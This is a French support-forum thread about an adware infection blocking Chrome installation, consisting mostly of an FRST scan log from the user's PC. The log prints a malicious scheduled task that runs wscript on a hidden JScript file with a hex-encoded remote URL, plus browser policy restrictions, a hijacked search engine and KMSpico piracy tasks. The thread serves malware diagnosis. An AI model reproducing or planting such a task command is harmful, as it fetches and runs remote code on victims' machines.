Probleme instalation chrome sur windows 10 pro
Fermé
jojo62
-
10 mai 2019 à 07:52
bazfile Messages postés 56277 Date d'inscription samedi 29 décembre 2012 Statut Modérateur, Contributeur sécurité Dernière intervention 29 octobre 2024 - 10 mai 2019 à 10:55
bazfile Messages postés 56277 Date d'inscription samedi 29 décembre 2012 Statut Modérateur, Contributeur sécurité Dernière intervention 29 octobre 2024 - 10 mai 2019 à 10:55
A voir également:
- Probleme instalation chrome sur windows 10 pro
- Clé windows 10 gratuit - Guide
- Windows 10 gratuit - Accueil - Mise à jour
- Winrar 64 bits windows 10 - Télécharger - Compression & Décompression
- Mon pc s'allume mais ne démarre pas windows 10 - Guide
- Logiciel montage vidéo gratuit windows 10 - Guide
2 réponses
bazfile
Messages postés
56277
Date d'inscription
samedi 29 décembre 2012
Statut
Modérateur, Contributeur sécurité
Dernière intervention
29 octobre 2024
19 241
10 mai 2019 à 09:09
10 mai 2019 à 09:09
Bonjour,
Infection par un adware:
Télécharge FRST une fois téléchargé enregistre-le sur le bureau puis ouvre-le tu auras ceci:
Clique sur Analyser à la fin de l'analyse tu auras deux fichiers texte sur le bureau FRST et Addition envoie ces rapports sur https://pjjoint.malekal.com/ voir ce tutoriel paragraphe Envoyer les rapports d’analyse sur pjjoint puis donne les deux liens générés par Pjoint dans ton prochain message.
Infection par un adware:
Télécharge FRST une fois téléchargé enregistre-le sur le bureau puis ouvre-le tu auras ceci:
Clique sur Analyser à la fin de l'analyse tu auras deux fichiers texte sur le bureau FRST et Addition envoie ces rapports sur https://pjjoint.malekal.com/ voir ce tutoriel paragraphe Envoyer les rapports d’analyse sur pjjoint puis donne les deux liens générés par Pjoint dans ton prochain message.
Résultats d'analyse de Farbar Recovery Scan Tool (FRST) (x64) Version: 08-05.2019
Exécuté par lenor (administrateur) sur DESKTOP-JTGIDI3 (10-05-2019 09:12:34)
Exécuté depuis C:\Users\lenor\Downloads
Profils chargés: lenor (Profils disponibles: lenor & Administrateur)
Platform: Windows 10 Pro Version 1809 17763.475 (X64) Langue: Français (France)
Navigateur par défaut: Edge
Mode d'amorçage: Normal
Tutoriel pour Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/
==================== Processus (Avec liste blanche) =================
(Si un élément est inclus dans le fichier fixlist.txt, le processus sera arrêté. Le fichier ne sera pas déplacé.)
() [Fichier non signé] C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.44.40.0_x64__kzf8qxf38zg5c\SkypeBackgroundHost.exe
() [Fichier non signé] C:\Program Files\WindowsApps\Microsoft.YourPhone_1.19041.481.0_x64__8wekyb3d8bbwe\YourPhone.exe
(Adobe Systems, Incorporated -> Adobe Systems Inc.) C:\Program Files (x86)\Adobe\Acrobat 11.0\Acrobat\acrotray.exe
(Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.) C:\Program Files\AMD\CNext\CNext\RadeonSettings.exe
(Advanced Micro Devices, Inc. -> AMD) C:\Windows\System32\atiesrxx.exe
(Apple Inc. -> Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Apple Inc. -> Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(AVB Disc Soft, SIA -> Disc Soft Ltd) C:\Program Files\DAEMON Tools Lite\DiscSoftBusServiceLite.exe
(AVB Disc Soft, SIA -> Disc Soft Ltd) C:\Program Files\DAEMON Tools Lite\DTAgent.exe
(CyberLink -> ) C:\Program Files\CyberLink\Shared files\RichVideo64.exe
(LogMeIn, Inc. -> LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn Hamachi\x64\LMIGuardianSvc.exe
(Microsoft Corporation -> © 2015 Microsoft Corporation) C:\Users\lenor\AppData\Local\Microsoft\BingSvc\BingSvc.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11425.20190.0_x64__8wekyb3d8bbwe\HxOutlook.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11425.20190.0_x64__8wekyb3d8bbwe\HxTsr.exe
(Microsoft Corporation -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.1904.1-0\MsMpEng.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
(Microsoft Corporation) [Fichier non signé] C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.44.40.0_x64__kzf8qxf38zg5c\SkypeApp.exe
(Microsoft Corporation) [Fichier non signé] C:\Program Files\WindowsApps\Microsoft.WindowsStore_11904.1001.1.0_x64__8wekyb3d8bbwe\WinStore.App.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\browser_broker.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\MicrosoftEdgeCP.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\MicrosoftEdgeCP.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\MicrosoftEdgeCP.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\MicrosoftEdgeCP.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\MicrosoftEdgeSH.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\SppExtComObj.Exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersServer.exe
(Microsoft Windows Hardware Compatibility Publisher -> Sonix) C:\Windows\vsnp2std.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Piriform Software Ltd -> Piriform Software Ltd) C:\Program Files\CCleaner\CCleaner64.exe
(Python Software Foundation -> Python Software Foundation) C:\Users\lenor\AppData\Roaming\YoutubeDownloader\python\python.exe
(VIA Technologies, Inc -> VIA Technologies, Inc.) C:\Windows\System32\ViakaraokeSrv.exe
==================== Registre (Avec liste blanche) ===========================
(Si un élément est inclus dans le fichier fixlist.txt, l'élément de Registre sera restauré à la valeur par défaut ou supprimé. Le fichier ne sera pas déplacé.)
HKLM\...\Run: [snp2std] => C:\WINDOWS\vsnp2std.exe [675840 2006-09-15] (Microsoft Windows Hardware Compatibility Publisher -> Sonix)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [508128 2016-01-07] (Adobe Systems Incorporated -> Adobe Systems Incorporated)
HKLM\...\Run: [AdobeGCInvoker-1.0] => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe [2675176 2018-12-13] (Adobe Systems Incorporated -> Adobe Systems, Incorporated)
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [302904 2019-01-18] (Apple Inc. -> Apple Inc.)
HKLM-x32\...\Run: [tsnp2std] => C:\Windows\tsnp2std.exe [258048 2007-01-05] (SONIX) [Fichier non signé]
HKLM-x32\...\Run: [BrMfcWnd] => C:\Program Files (x86)\Brother\Brmfcmon\BrMfcWnd.exe [1163264 2012-09-25] () [Fichier non signé]
HKLM-x32\...\Run: [ControlCenter3] => C:\Program Files (x86)\Brother\ControlCenter3\brctrcen.exe [114688 2008-12-24] (Brother Industries, Ltd.) [Fichier non signé]
HKLM-x32\...\Run: [Acrobat Assistant 8.0] => C:\Program Files (x86)\Adobe\Acrobat 11.0\Acrobat\Acrotray.exe [3500056 2017-11-01] (Adobe Systems, Incorporated -> Adobe Systems Inc.)
HKLM-x32\...\Run: [LogMeIn Hamachi Ui] => C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2-ui.exe [5890504 2019-04-02] (LogMeIn, Inc. -> LogMeIn Inc.)
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-1452226929-484460335-584983045-1001\...\Run: [BingSvc] => C:\Users\lenor\AppData\Local\Microsoft\BingSvc\BingSvc.exe [144008 2015-11-05] (Microsoft Corporation -> © 2015 Microsoft Corporation)
HKU\S-1-5-21-1452226929-484460335-584983045-1001\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [3152160 2019-04-17] (Valve -> Valve Corporation)
HKU\S-1-5-21-1452226929-484460335-584983045-1001\...\Run: [CCleaner Smart Cleaning] => C:\Program Files\CCleaner\CCleaner64.exe [22515488 2019-04-04] (Piriform Software Ltd -> Piriform Software Ltd)
HKU\S-1-5-21-1452226929-484460335-584983045-1001\...\Run: [DAEMON Tools Lite Automount] => C:\Program Files\DAEMON Tools Lite\DTAgent.exe [731240 2018-12-17] (AVB Disc Soft, SIA -> Disc Soft Ltd)
HKU\S-1-5-21-1452226929-484460335-584983045-1001\...\Run: [YoutubeDownloader] => C:\Users\lenor\AppData\Roaming\YoutubeDownloader\python\pythonw.exe [95904 2018-11-02] (Python Software Foundation -> Python Software Foundation) <==== ATTENTION
IFEO\OSppSvc.exe: [Debugger] ***@***
Startup: C:\Users\lenor\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Envoyer à OneNote.lnk [2018-06-17]
ShortcutTarget: Envoyer à OneNote.lnk -> C:\Program Files\Microsoft Office\Office16\ONENOTEM.EXE (Microsoft Corporation -> Microsoft Corporation)
Startup: C:\Users\lenor\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WatchDog.lnk [2018-02-13]
ShortcutTarget: WatchDog.lnk -> C:\iSmartViewPlus\WatchDog.exe (Shenzhen Smarteye Digital Electronics Co., Ltd) [Fichier non signé]
GroupPolicy: Restriction - Chrome <==== ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
==================== Tâches planifiées (Avec liste blanche) =============
(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)
Task: {040F1800-D0C2-4520-AD85-5FB1BDE6417C} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [335872 2019-03-12] (Adobe Systems Incorporated -> Adobe Systems Incorporated)
Task: {211F1232-FDFE-4925-8167-CBAB9C10B140} - System32\Tasks\{6C77685D-7F00-4C1E-AEE5-91A62F78D5AD} => "c:\program files\internet explorer\iexplore.exe" hxxps://ui.skype.com/ui/0/7.41.0.101/fr/abandoninstall?page=tsMain
Task: {2A26951C-498C-4BDF-BF0A-72D844803E2E} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files\Microsoft Office\Office16\msoia.exe [416432 2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Task: {2AB1A2D9-72C8-48C6-BF11-9FB4A0654879} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files\Microsoft Office\Office16\msoia.exe [416432 2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Task: {2C0DD536-7EF3-4CCF-A4F6-7AC6F8C451E1} - System32\Tasks\YoutubeDownloader => C:\Users\lenor\AppData\Roaming\YoutubeDownloader\python\pythonw.exe [95904 2018-11-02] (Python Software Foundation -> Python Software Foundation) <==== ATTENTION
Task: {3024A2E8-0D46-467B-9701-1BD5889F12FE} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1904.1-0\MpCmdRun.exe [480352 2019-04-23] (Microsoft Corporation -> Microsoft Corporation)
Task: {3D2B13DF-DE9F-4BFC-BB29-F1D85BD1BF62} - System32\Tasks\Avast Software\Overseer => C:\Program Files\Common Files\Avast Software\Overseer\overseer.exe [2380088 2019-04-03] (AVAST Software s.r.o. -> AVAST Software)
Task: {3E09A70A-EC0E-4756-9E31-146B6C3455E1} - System32\Tasks\StartCN => C:\Program Files\AMD\CNext\CNext\cncmd.exe [52104 2017-09-22] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
Task: {40E135C0-A21D-4069-A0BF-06A411388531} - System32\Tasks\R@1n-KMS\Windows64Professional => wmic path SoftwareLicensingProduct where (ID="2de67392-b7a7-462a-b1ca-108dd189f588") call Activate
Task: {4F208EA8-779E-4B31-995F-2AF46796A2FA} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1904.1-0\MpCmdRun.exe [480352 2019-04-23] (Microsoft Corporation -> Microsoft Corporation)
Task: {53FA6470-6C4B-48F7-949D-9A0EE43A2CF5} - System32\Tasks\{3F7FF5BB-9B22-444D-872C-B464C65A7AFA} => "c:\windows\system32\launchwinapp.exe" hxxps://ui.skype.com/ui/0/7.32.0.104/fr/go/help.faq.installer?LastError=1618
Task: {5820068A-6E18-4724-B116-EB6325CC3561} - System32\Tasks\AutoPico Daily Restart => C:\Program Files\KMSpico\AutoPico.exe
Task: {6F6AE38A-CD1D-4059-98FB-CEFF93E670C3} - System32\Tasks\GarminUpdaterTask => C:\Program Files (x86)\Garmin\Express SelfUpdater\ExpressSelfUpdater.exe [39920 2018-10-24] (Garmin International, Inc. -> )
Task: {7852DA1A-4BC5-4F84-9566-425C4725D74B} - System32\Tasks\Adobe Flash Player NPAPI Notifier => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_32_0_0_171_Plugin.exe [1456696 2019-04-10] (Adobe Inc. -> Adobe)
Task: {79A0F6D9-6F2F-44AC-A3C3-71CB3ED6C16D} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1195544 2018-12-16] (Adobe Systems, Incorporated -> Adobe Systems Incorporated)
Task: {7FAB7B5B-97EB-4840-9AB8-FBBA1F4B9A8A} - System32\Tasks\Chameleon Folder-lenor => "C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe"
Task: {8A94BE45-4D74-49EE-851C-514F6A4313C2} - System32\Tasks\wKernelCrash => wKernelCrash
Task: {9197AA68-498E-4351-A857-8B32BC1797FF} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [616320 2018-01-08] (Apple Inc. -> Apple Inc.)
Task: {9CFA6BA7-A5F1-4B41-8882-37560E2D7A8E} - System32\Tasks\CCleaner Update => C:\Program Files\CCleaner\CCUpdate.exe [619416 2019-04-04] (Piriform Software Ltd -> Piriform Software Ltd)
Task: {9F639095-A78E-45E0-812E-94DCBD03EBBD} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [16509040 2019-04-04] (Piriform Software Ltd -> Piriform Software Ltd)
Task: {A8ABC819-BE5F-4B07-A3FB-5E05200EA9E1} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1904.1-0\MpCmdRun.exe [480352 2019-04-23] (Microsoft Corporation -> Microsoft Corporation)
Task: {AC63497B-4A91-4266-94DE-5604EB402564} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1904.1-0\MpCmdRun.exe [480352 2019-04-23] (Microsoft Corporation -> Microsoft Corporation)
Task: {C3B3541F-DD10-4D4F-A689-84A47EC8145F} - System32\Tasks\***@*** => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe [2675176 2018-12-13] (Adobe Systems Incorporated -> Adobe Systems, Incorporated)
Task: {CCD012B8-F79D-48C7-8CD9-8F9CF78D5944} - System32\Tasks\S-1-5-21-1452226929-484460335-584983045-1001\DataSenseLiveTileTask => C:\WINDOWS\System32\DataUsageLiveTileTask.exe [134144 2019-03-12] (Microsoft Windows -> Microsoft Corporation)
Task: {CD8413B8-0B7A-4B6F-A247-5C6BFA9D56B6} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Shared\Office16\OLicenseHeartbeat.exe [316632 2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Task: {D548B3B3-AEB4-4865-B0A6-5A97318C751E} - System32\Tasks\R@1n-KMS\Office16ProPlus => wmic path SoftwareLicensingProduct where (ID="d450596f-894d-49e0-966a-fd39ed4c4c64") call Activate
Task: {E57A9365-CA32-4756-8DE0-855AB6917666} - System32\Tasks\Yahoo! Powered rocim => C:\WINDOWS\system32\wscript.exe "C:\ProgramData\{6225A746-E867-2D80-6EA1-B3C2F4E3380C}\dosa.txt" "68747470733a2f2f643277763764656e63316a78397a2e636c6f756466726f6e742e6e6574" "//B" "//E:jscript" "--IsErIk" <==== ATTENTION
Task: {E6D6DB92-154A-4956-875B-635FB488AE33} - System32\Tasks\R@1n-KMS\Windows100Professional => wmic path SoftwareLicensingProduct where (ID="2de67392-b7a7-462a-b1ca-108dd189f588") call Activate
Task: {E974CB64-0BE0-4603-913E-234F86990054} - System32\Tasks\{1E3119E5-1603-4913-A777-A1C5DF1CA0CE} => "c:\program files\mozilla firefox\firefox.exe" hxxps://ui.skype.com/ui/0/7.40.0.103/fr/go/help.faq.installer?LastError=1618
(Si un élément est inclus dans le fichier fixlist.txt, le fichier tâche (.job) sera déplacé. Le fichier exécuté par la tâche ne sera pas déplacé.)
Task: C:\WINDOWS\Tasks\wKernelCrash.job => C:\Users\lenor\AppData\Roaming\Microsoft\Windows\DESKTOP-JTGIDI3\lenorNWindows Foundation Services, Ban will cause system crash, please keep bootingጃ0
Task: C:\WINDOWS\Tasks\Yahoo! Powered rocim.job => C:\WINDOWS\system32\wscript.ex C:\ProgramData\{6225A746-E867-2D80-6EA1-B3C2F4E3380C}\dosa.txt <==== ATTENTION
==================== Internet (Avec liste blanche) ====================
(Si un élément est inclus dans le fichier fixlist.txt, s'il s'agit d'un élément du Registre, il sera supprimé ou restauré à la valeur par défaut.)
Hosts: Il y a plus d'un élément dans hosts. Voir la section Hosts de Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{1f237367-5650-472f-8f9d-d2cec574e3a2}: [DhcpNameServer] 192.168.1.1
Internet Explorer:
==================
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <==== ATTENTION
HKU\S-1-5-21-1452226929-484460335-584983045-1001\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://www.google.com/search?bcutc=sp-006&q={searchTerms}
HKU\S-1-5-21-1452226929-484460335-584983045-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.bing.com/?pc=COSP&ptag=D012219-N0690A3904163984&form=CONMHP&conlogo=CT3335855
SearchScopes: HKLM-x32 -> DefaultScope {E9410C70-B6AE-41FF-AB71-32F4B279EA5F} URL = hxxps://www.google.com/search?bcutc=sp-006&q={searchTerms}
SearchScopes: HKLM-x32 -> {E9410C70-B6AE-41FF-AB71-32F4B279EA5F} URL = hxxps://www.google.com/search?bcutc=sp-006&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1452226929-484460335-584983045-1001 -> DefaultScope {6855D245-F7E4-4699-8BE8-BDA8970FE987} URL = hxxp://search.hmyinstantsocial.com/s?uc=20190319&i_id=social_spt__1.30&source=12134_v1-bb9-iei&ap=appfocus340&uid=97cde529-de37-4c0a-98c5-50e879ee8c10&query={searchTerms}
SearchScopes: HKU\S-1-5-21-1452226929-484460335-584983045-1001 -> {6855D245-F7E4-4699-8BE8-BDA8970FE987} URL = hxxp://search.hmyinstantsocial.com/s?uc=20190319&i_id=social_spt__1.30&source=12134_v1-bb9-iei&ap=appfocus340&uid=97cde529-de37-4c0a-98c5-50e879ee8c10&query={searchTerms}
SearchScopes: HKU\S-1-5-21-1452226929-484460335-584983045-1001 -> {E9410C70-B6AE-41FF-AB71-32F4B279EA5F} URL = hxxps://www.google.com/search?bcutc=sp-006&q={searchTerms}
BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\Office16\OCHelper.dll [2019-04-16] (Microsoft Corporation -> Microsoft Corporation)
BHO: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.8.0_201\bin\ssv.dll [2019-01-22] (Oracle America, Inc. -> Oracle Corporation)
BHO: Adobe Acrobat Create PDF Helper -> {AE7CD045-E861-484f-8273-0445EE161910} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\x64\AcroIEFavClient.dll [2017-11-01] (Adobe Systems, Incorporated -> Adobe Systems Incorporated)
BHO: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office\Office16\GROOVEEX.DLL [2018-07-20] (Microsoft Corporation -> Microsoft Corporation)
BHO: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre1.8.0_201\bin\jp2ssv.dll [2019-01-22] (Oracle America, Inc. -> Oracle Corporation)
BHO: Adobe Acrobat Create PDF from Selection -> {F4971EE7-DAA0-4053-9964-665D8EE6A077} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\x64\AcroIEFavClient.dll [2017-11-01] (Adobe Systems, Incorporated -> Adobe Systems Incorporated)
BHO-x32: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\Office16\OCHelper.dll [2019-04-17] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: Adobe Acrobat Create PDF Helper -> {AE7CD045-E861-484f-8273-0445EE161910} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\AcroIEFavClient.dll [2017-11-01] (Adobe Systems, Incorporated -> Adobe Systems Incorporated)
BHO-x32: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\Office16\GROOVEEX.DLL [2018-07-22] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: Adobe Acrobat Create PDF from Selection -> {F4971EE7-DAA0-4053-9964-665D8EE6A077} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\AcroIEFavClient.dll [2017-11-01] (Adobe Systems, Incorporated -> Adobe Systems Incorporated)
Toolbar: HKLM - Adobe Acrobat Create PDF Toolbar - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\x64\AcroIEFavClient.dll [2017-11-01] (Adobe Systems, Incorporated -> Adobe Systems Incorporated)
Toolbar: HKLM-x32 - Adobe Acrobat Create PDF Toolbar - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\AcroIEFavClient.dll [2017-11-01] (Adobe Systems, Incorporated -> Adobe Systems Incorporated)
Toolbar: HKU\S-1-5-21-1452226929-484460335-584983045-1001 -> Pas de nom - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - Pas de fichier
Handler: mso-minsb.16 - {3459B272-CC19-4448-86C9-DDC3B4B2FAD3} - C:\Program Files\Microsoft Office\Office16\MSOSB.DLL [2019-03-12] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: mso-minsb.16 - {3459B272-CC19-4448-86C9-DDC3B4B2FAD3} - C:\Program Files (x86)\Microsoft Office\Office16\MSOSB.DLL [2019-03-12] (Microsoft Corporation -> Microsoft Corporation)
Handler: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files\Microsoft Office\Office16\MSOSB.DLL [2019-03-12] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\Office16\MSOSB.DLL [2019-03-12] (Microsoft Corporation -> Microsoft Corporation)
FireFox:
========
FF DefaultProfile: 2dq5o2ru.default-1552240511929
FF ProfilePath: C:\Users\lenor\AppData\Roaming\Mozilla\Firefox\Profiles\2dq5o2ru.default-1552240511929 [2019-05-10]
FF Homepage: Mozilla\Firefox\Profiles\2dq5o2ru.default-1552240511929 -> hxxps://www.bing.com/
FF Extension: (hotfix-update-xpi-intermediate) - C:\Users\lenor\AppData\Roaming\Mozilla\Firefox\Profiles\2dq5o2ru.default-1552240511929\Extensions\***@*** [2019-05-09]
FF Extension: (Avast Online Security) - C:\Users\lenor\AppData\Roaming\Mozilla\Firefox\Profiles\2dq5o2ru.default-1552240511929\Extensions\***@*** [2019-05-09]
FF Extension: (Adblock Plus - bloqueur de publicités gratuit) - C:\Users\lenor\AppData\Roaming\Mozilla\Firefox\Profiles\2dq5o2ru.default-1552240511929\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2019-04-21]
FF HKLM\...\Firefox\Extensions: [***@***] - C:\Program Files (x86)\Adobe\Acrobat 11.0\Acrobat\Browser\WCFirefoxExtn\WebExtn\signed_extn\adobe_acrobat-1.0-windows.xpi
FF Extension: (Adobe Acrobat) - C:\Program Files (x86)\Adobe\Acrobat 11.0\Acrobat\Browser\WCFirefoxExtn\WebExtn\signed_extn\adobe_acrobat-1.0-windows.xpi [2017-11-01]
FF HKLM-x32\...\Firefox\Extensions: [***@***] - C:\Program Files (x86)\Adobe\Acrobat 11.0\Acrobat\Browser\WCFirefoxExtn\WebExtn\signed_extn\adobe_acrobat-1.0-windows.xpi
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_32_0_0_171.dll [2019-04-10] (Adobe Inc. -> )
FF Plugin: @garmin.com/GpsControl -> C:\Program Files\Garmin GPS Plugin\npGarmin.dll [2014-03-31] (Garmin International, Inc. -> GARMIN Corp.)
FF Plugin: @java.com/DTPlugin,version=11.201.2 -> C:\Program Files\Java\jre1.8.0_201\bin\dtplugin\npDeployJava1.dll [2019-01-22] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.201.2 -> C:\Program Files\Java\jre1.8.0_201\bin\plugin2\npjp2.dll [2019-01-22] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.50918.0\npctrl.dll [2018-10-23] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~1\MICROS~1\Office16\NPSPWRAP.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect64.dll [2015-07-29] (Adobe Systems Incorporated -> Adobe Systems)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_32_0_0_171.dll [2019-04-10] (Adobe Inc. -> )
FF Plugin-x32: @garmin.com/GpsControl -> C:\Program Files (x86)\Garmin GPS Plugin\npGarmin.dll [2014-03-31] (Garmin International, Inc. -> GARMIN Corp.)
FF Plugin-x32: @itstructures.com/ffactivex -> J:\IPCOcx\npffax.dll [Pas de fichier]
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2018-10-16] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\npctrl.dll [2018-10-23] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office16\NPSPWRAP.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @videolan.org/vlc,version=2.2.6 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-01-10] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.8 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-01-10] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=3.0.3 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-01-10] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=3.0.6 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-01-10] (VideoLAN -> VideoLAN)
FF Plugin-x32: Adobe Acrobat -> C:\Program Files (x86)\Adobe\Acrobat 11.0\Acrobat\Air\nppdf32.dll [2017-11-01] (Adobe Systems, Incorporated -> Adobe Systems Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2019-03-25] (Adobe Inc. -> Adobe Systems Inc.)
